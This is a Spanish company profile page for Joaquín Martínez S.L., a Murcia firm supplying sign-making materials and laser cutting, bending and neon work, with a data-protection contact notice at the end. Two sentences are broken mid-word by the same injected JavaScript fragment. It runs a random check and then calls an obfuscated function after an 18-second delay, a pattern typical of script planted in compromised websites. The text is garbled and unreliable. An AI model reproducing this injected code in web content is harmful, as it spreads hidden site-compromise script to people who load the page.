Joaquín Martínez S.L

Empresa

Joaquín Martínez S.L

Joaquín Martínez S.L. nace en 1984

Con el propósito de dar servicio al sector del rótulo facilitandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}ando la materia prima necesaria para la producción y fabricación del mismo. Con el paso de los años, la empresa se ha adaptado progresivamente a las necesidades del sector adquiriendo maquinaria de alta tecnología que facilitara los proceso de fabricación del rótulo y permitieran la reducción tanto de los tiempos de fabricación como el coste de los mismos.

El elevado coste de la maquinaria necesaria para la producción de rótulos no es asumible individualmente por la mayoría de las empresas del sector por lo que estas se ven obligadas a subcontratar partes del proceso. Joaquín Martínez S.L. aúna la gran mayoría de estos procesos, lo que la sitúa como una de las mejores soluciones a tener en cuenta por estas empresas.

Actualmente, la empresa cuenta con dos secciones principales: una especializada en la manipulación de materiales como el metacrilato, policarbonato, PVC, PTEG, etc y otra especializada en el corte, plegado y soldadura de chapa metálica: hierro, acero inoxidable, aluminio. Cuenta también con un taller de fabricación de rótulos de neón y un taller especializado en la manipulación de materiales tales como el metacrilato y el policarbonato. En cuanto a maquinaria; 2 máquinas de corte láser para metales, 1 máquina de corte láser para metacrilato y madera, entre otros materiales y 1 máquina fresadora CNC de 5 ejes para materiales no férricos, adicionalmente cuenta con 2 plegadoras: una de 4 m (180 TN ) y otra de 2 m ( 100 TN ) con robot.

Adicionalmente, además de la pequeña maquinaria como sierras, torno, cizalla, la empresa cuenta con una plegadora, ampliandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}ando así nuestra oferta para la fabricación de piezas industriales.

CONTACTA CON NOSOTROS

En el caso que nos facilite datos de carácter personal, se incluirán en nuestro fichero automatizado, de conformidad con lo expuesto por el Reglamento General de Protección de datos (679/16 EU) y la LOPDGDD 3/2018, a fin y efecto, de poder dar respuesta a la consulta que nos realiza ya sea mediante el formulario o mediante el link de correo electrónico que constan en la Web.

Si lo desea, podrá ejercer su derecho de acceso, rectificación, supresión/ olvido/oposición y limitación al tratamiento de datos, comunicándolo a la dirección jm@jmsl.net JOAQUÍN MARTINEZ S.L. Camino Leñadores, Nave 35 (Carril Mayayo) 30120 El Palmar (Murcia) o presentar reclamación ante la Autoridad de control.